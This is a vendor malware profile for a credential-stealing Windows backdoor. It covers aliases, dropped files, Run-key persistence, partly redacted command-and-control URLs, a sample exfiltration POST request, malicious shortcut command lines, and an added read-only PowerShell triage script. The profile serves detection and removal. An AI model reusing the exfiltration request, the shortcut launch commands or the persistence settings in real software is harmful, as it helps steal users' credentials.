Virus Profile: Generic BackDoor.u

Virus Profile information details
Risk Assessment: Home Low-Profiled | Corporate Low-Profiled
Date Discovered: 4/5/2005
Date Added: 4/4/2005
Origin: N/A
Length: varies
Type: Trojan
Subtype: Win32
DAT Required: 7001
Removal Instructions
Description

This is a Trojan detection. Unlike viruses, Trojans do not self-replicate. They are spread manually, often under the premise that they are beneficial or wanted. The most common installation methods involve system or security exploitation, and unsuspecting users manually executing unknown programs. Distribution channels include e-mail, malicious or hacked Web pages, Internet Relay Chat (IRC), peer-to-peer networks, etc.

Aliases
  • Microsoft    -    PWS:Win32/Fareit
  • Symantec    -    Downloader.Ponik
  • Nod32        -    Win32/PSW.Fareit.A trojan
  • Norman     -    W32/Troj_Generic.FZZFL (trojan)


-- Update March 9, 2010 --
The risk assessment of this threat has been updated to Low-Profiled due to media attention at: http://news.techworld.com/security/3214563/energizer-bunny-infects-pcs-with-backdoor-malware/

--

Generic BackDoor.u is a generic detection name for Trojans that open a backdoor and allow the attacker to issue commands to control the compromised machines. More information on Generic BackDoor detections is available here.


Indication of Infection

Presence of the above-mentioned files and registry keys.

Presence of an unexpected network connection to the above-mentioned IP address.

Methods of Infection

Trojans do not self-replicate. They are spread manually, often under the premise that the executable is something beneficial. Distribution channels include IRC, peer-to-peer networks, newsgroup postings, etc.

Virus Characteristics

------------------------------------------------Updated on 14 June 2013--------------------------------------------

Aliases

  • Symantec - Trojan.Gen.2
  • Norman - winpe/Troj_Generic.LTSYE
  • Microsoft - Trojan:MSIL/Remdobe
  • Drweb - BackDoor.Blackshades.17
  • Kaspersky - Trojan.Win32.Agent.ygxb

Generic BackDoor.u is a detection for this Trojan, which gives a remote attacker unauthorized access to and control of the infected computer.

This Trojan also opens a backdoor and allows the attacker to issue commands to control the compromised machine.

Upon execution, the Trojan tries to connect to the domain below, resolving it through NBNS (NetBIOS Name Service).

  • whowas.pw

The Trojan copies itself to the following location:

  • \%APPDATA%\AudioCard\vAudioCard.exe

------------------------------------------------Updated on 21 May 2013--------------------------------------------

Aliases

  • Microsoft - PWS:Win32/Fareit
  • Symantec - Trojan.Zbot
  • Kaspersky - Trojan-PSW.Win32.Tepfer.hlfp
  • Norman - ZBot.HDFL
  • Ikarus - Trojan-Spy.Zbot

“Generic BackDoor.u” is a generic detection for a Trojan that steals sensitive information from the compromised machine and sends it to the remote attacker. The Trojan may delete itself after execution.

“Generic BackDoor.u” steals stored passwords, cache and cookies from the following types of application:

  • E-mail client
  • Browser
  • FTP client

Upon execution, the Trojan drops files into the following locations:

  • %AppData%\Microsoft\Address Book\Administrator.wab
  • %AppData%\Kyhy\nuyf.exe

The Trojan creates the following folders:

  • %AppData%\Microsoft\Address Book
  • %AppData%\Kyhy

Upon execution, the Trojan injects code into explorer.exe and tries to connect to the following IP addresses:

  • 84[Removed]66.46
  • 81[Removed]145.66
  • 204[Removed]165.68
  • 108[Removed]1.3

The following registry keys are added to the system:

  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\Internet Account Manager
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\Internet Account Manager\Accounts
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\Internet Account Manager\Accounts\VeriSign
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\WAB
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\WAB\WAB4
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\WAB\WAB4\Wab File Name

The following registry key values have been added to the system.

  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications: 0x00000000

The registry value above ensures that the Trojan disables the “firewall disable notification message” setting.

  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\Windows\CurrentVersion\Run\{GUID}: "%AppData%\Kyhy\nuyf.exe"

The registry entry above ensures that the malware is executed every time the system starts.

  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\
    • LDAP Server ID: 0x00000003
    • Account Name: "WhoWhere Internet Directory Service"
    • LDAP Server: "ldap.whowhere.com"
    • LDAP URL: "http://www.whowhere.com"
    • LDAP Search Return: 0x00000064
    • LDAP Timeout: 0x0000003C
    • LDAP Authentication: 0x00000000
    • LDAP Simple Search: 0x00000001
    • LDAP Logo: "%ProgramFiles%\Common Files\Services\whowhere.bmp"
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\
    • LDAP Server ID: 0x00000002
    • Account Name: "VeriSign Internet Directory Service"
    • LDAP Server: "directory.verisign.com"
    • LDAP URL: "http://www.verisign.com"
    • LDAP Search Return: 0x00000064
    • LDAP Timeout: 0x0000003C
    • LDAP Authentication: 0x00000000
    • LDAP Search Base: "NULL"
    • LDAP Simple Search: 0x00000001
    • LDAP Logo: "%ProgramFiles%\Common Files\Services\verisign.bmp"
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\
    • LDAP Server ID: 0x00000001
    • Account Name: "Bigfoot Internet Directory Service"
    • LDAP Server: "ldap.bigfoot.com"
    • LDAP URL: "http://www.bigfoot.com"
    • LDAP Search Return: 0x00000064
    • LDAP Timeout: 0x0000003C
    • LDAP Authentication: 0x00000000
    • LDAP Simple Search: 0x00000001
    • LDAP Logo: "%ProgramFiles%\Common Files\Services\bigfoot.bmp"
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\
    • LDAP Server ID: 0x00000000
    • Account Name: "Active Directory"
    • LDAP Server: "NULL"
    • LDAP Search Return: 0x00000064
    • LDAP Timeout: 0x0000003C
    • LDAP Authentication: 0x00000002
    • LDAP Simple Search: 0x00000000
    • LDAP Bind DN: 0x00000000
    • LDAP Port: 0x00000CC4
    • LDAP Resolve Flag: 0x00000001
    • LDAP Secure Connection: 0x00000000
    • LDAP User Name: "NULL"
    • LDAP Search Base: "NULL"
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\Internet Account Manager\Accounts\
    • PreConfigVer: 0x00000004
    • PreConfigVerNTDS: 0x00000001
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\Internet Account Manager\
    • Server ID: 0x00000004
    • Default LDAP Account: "Active Directory GC"
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\WAB\WAB4\Wab File Name\: "%AppData%\Microsoft\Address Book\Administrator.wab"
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\WAB\WAB4\OlkContactRefresh: 0x00000000
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\WAB\WAB4\OlkFolderRefresh: 0x00000000

The Trojan collects the following information from the infected machine (via these API calls) and sends it to the remote attacker through remote port 8080:

  • GetUserNameA
  • Gethostbyname
  • GetLocaleInfoA
  • GetSystemInfo

--------------------------------------------------Updated 2nd Apr 2013------------------------------------------------

Aliases

  • Ikarus   - Trojan-Downloader.Win32.Homa

Characteristics –

“Generic BackDoor.u” is a detection for this Trojan, which receives commands from an attacker to access the infected machine and download other payloads.

The Trojan connects to the following IP address:

  • 188.[Removed].47.145

The Trojan drops the following files:

  • %userprofile%\UserName\Desktop\cnf.txt
  • %userprofile%\UserName\Desktop\GooglSrvices.lnk
  • %userprofile%\UserName\Desktop\R.vbs
  • %userprofile%\UserName\Recent\cnf.txt.lnk
  • %userprofile%\UserName\Recent\R.vbs.lnk
  • %userprofile%\UserName\Start Menu\Programs\Startup\GooglSrvices.lnk
  • %userprofile%\Administrator\Start Menu\Programs\Startup\Updater.lnk

The .lnk files above are created to point at the malware file.

The script file dropped on the desktop (R.vbs) is used to run the .lnk files, which in turn run the executable.

---------------------------------------------------------------------------------------------------------------------------------

--------------------------------------------------Updated 1st Apr 2013------------------------------------------------

Aliases

  • Microsoft - Trojan:Win32/Viensi.A

Characteristics –

“Generic BackDoor.u” is a detection for this Trojan, which posts encrypted system information to the sites below and may also download malicious content from websites and infect the compromised system.

Upon execution, the Trojan first calls shutdown.exe so that the “Turn off” menu appears.

The Trojan connects to the following URLs:

  • ca.[Remove].it
  • 12.120.[Removed].206
  • 12.120.[Removed].208

The URLs above may vary with the geographical location where the malicious content is executed; the Trojan posts encrypted system information to these sites:

  • POST /ping.html HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
    Host: e-statistics.cc
    Content-Length: 9948
    Cache-Control: no-cache
    Content-Type: application/x-www-form-urlencoded

    z=P8lvsmpmwVyY7lLJAnK60TUizGDXSdB9PCBKdUVwmflUQl6nsv5IIm7uuT7o7h ... <BIG BLOCK OF base64 DATA>

The Trojan may also add .lnk files whose command lines follow formats similar to these:

  • /C start cmd.exe /C if exist \path\to\thumbs.dbF start \path\to\thumbs.dbF && start "" "OriginalApp.exe"
  • /C start cmd.exe /C if exist "\path\to\[Random].[xXxX]" start "" "[Random].[xXxX]"
  • /C start cmd.exe /C if exist "[Random].[xXxX]" start "" "[Random].[xXxX]" && start "" "OriginalFileName"
  • /C start cmd.exe /C if exist "[Random].[xXxX]" start "" "[Random].[xXxX]" && start "" " OriginalFileName " \path\to\thLmbs.db

The Trojan also opens the copy before opening the original target.
The Trojan may also download malicious content from websites and infect the compromised system.

---------------------------------------------------------------------------------------------------------------------------------

-------Updated 17th Jan 2013---------

“Generic BackDoor.u” steals stored passwords, cache and cookies from the following types of application:

  • E-mail client
  • Browser
  • FTP client

The Trojan also downloads other PWS variants to the compromised machine.

Upon execution, the Trojan tries to connect to the following URLs through remote port 8080, so that the remote attacker can issue commands to control the compromised machine and download other payloads:

  • hxxp://forum-voip[Removed]080/ponyb/gate.php
  • hxxp://foru[Removed]onyb/gate.php
  • hxxp://paralysi[Removed]/ponyb/gate.php
  • hxxp://paralys[Removed]080/ponyb/gate.php
  • hxxp://accesx[removed]Kv9.exe
  • hxxp://www.k[Removed]uY3VZr.exe
  • hxxp://rankma[Removed].com/XsuzdnC3.exe
  • 254.11[Removed]192
  • 25[Removed]8.192

The URLs above were down at the time of analysis.

The following registry key values have been added to the system.

  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass: 1

The registry value above ensures that the Trojan disables the proxy settings.

  • HKEY_USERS\S-1-5-[Varies]\Software\WinRAR\HWID: 7B 38 34 34 34 31 30 30 39 2D 43 35 45 35 2D 34 38 45 30 2D 41 42 46 46 2D 39 43 38 34 46 43 39 36 31 34 31 37 7D

The Trojan creates a mutex with the following name:

  • _!MSFTHISTORY!_

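A read-only host triage check for the artifacts this page lists (the dropped files and Run key from the 21 May and 14 June 2013 updates, the Startup shortcuts from the 2 Apr and 1 Apr 2013 updates, and the ProxyBypass value and mutex above), written here as an added example rather than McAfee's own tooling. It assumes the XP-era paths on the page map to the current user's profile, Desktop and Startup folders, and that ControlSet001 is the CurrentControlSet.

```powershell
# Added example, not McAfee's code: read-only triage of a Windows host for the
# Generic BackDoor.u artifacts listed on this page. It reports and removes nothing.
$findings = @()

# Dropped files (21 May 2013, 14 June 2013 and 2 Apr 2013 updates). Desktop and
# Startup folder locations are resolved by the OS rather than hard-coded.
$desktop = [Environment]::GetFolderPath('Desktop')
$startup = [Environment]::GetFolderPath('Startup')
$paths = @("$env:APPDATA\Kyhy\nuyf.exe", "$env:APPDATA\AudioCard\vAudioCard.exe",
           "$desktop\R.vbs", "$desktop\GooglSrvices.lnk", "$desktop\cnf.txt",
           "$startup\GooglSrvices.lnk", "$startup\Updater.lnk")
foreach ($p in $paths) { if (Test-Path -LiteralPath $p) { $findings += "File present: $p" } }

# Run-key persistence pointing at the dropped executables (21 May 2013 update)
$runKey = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
foreach ($prop in (Get-ItemProperty -Path $runKey).PSObject.Properties) {
    if ($prop.Value -is [string] -and $prop.Value -match 'nuyf\.exe|vAudioCard\.exe') {
        $findings += "Run value '$($prop.Name)' -> $($prop.Value)"
    }
}

# Startup shortcuts whose arguments follow the "cmd.exe /C if exist ..." pattern from
# the 1 Apr 2013 update; shortcut fields are read through the WScript.Shell COM object
$shell = New-Object -ComObject WScript.Shell
Get-ChildItem -Path $startup -Filter *.lnk -ErrorAction SilentlyContinue | ForEach-Object {
    $lnk = $shell.CreateShortcut($_.FullName)
    if ($lnk.Arguments -match '/C\s+start\s+cmd\.exe\s+/C\s+if\s+exist') {
        $findings += "Startup shortcut $($_.Name) launches cmd.exe: $($lnk.Arguments)"
    }
}

# Registry values the page reports as added. Both also occur on clean hosts
# (ProxyBypass=1 is a common default), so treat them as corroborating signals only.
$fwKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile'
$fw = Get-ItemProperty -Path $fwKey -Name DisableNotifications -ErrorAction SilentlyContinue
if ($fw) { $findings += "Firewall StandardProfile DisableNotifications = $($fw.DisableNotifications)" }
$zoneMap = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap'
$pb = Get-ItemProperty -Path $zoneMap -Name ProxyBypass -ErrorAction SilentlyContinue
if ($pb -and $pb.ProxyBypass -eq 1) { $findings += 'ZoneMap ProxyBypass = 1' }

# Mutex named in the 17 Jan 2013 update. Weak evidence on its own; corroborate
# with the file and Run-key findings above.
try {
    $m = [System.Threading.Mutex]::OpenExisting('_!MSFTHISTORY!_'); $m.Dispose()
    $findings += 'Mutex _!MSFTHISTORY!_ is present'
} catch { }

if ($findings.Count -eq 0) { 'No Generic BackDoor.u indicators found.' }
else { $findings | ForEach-Object { "[!] $_" } }
```

Run it in the context of the user whose profile is being examined; the HKLM firewall value is readable without elevation but the Startup and Run checks only cover the current user.
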
The Trojan collects the following information from the infected machine (via these API calls) and sends it to the remote attacker through remote port 80:

  • GetLocaleInfoA
  • GetUserNameA
  • gethostbyname
  • GetNativeSystemInfo
  • GetSystemInfo

The Trojan steals stored passwords, cache and cookies from the following applications.

  • Opera
  • Firefox
  • Internet Explorer
  • Google Chrome
  • Windows Live Mail
  • Thunderbird
  • Bromium
  • Nichrome
  • Comodo
  • RockMelt
  • Visicom Media
  • Chromium
  • Global Downloader
  • NetSarang
  • Cyberduck
  • Pocomail
  • BatMail

The Trojan tries to hack servers using the password list below:

All Users:
Use the current engine and DAT files for detection and removal.

Modifications made to the system registry and/or INI files for the purpose of hooking system startup will be removed when cleaning with the recommended engine and DAT combination (or higher).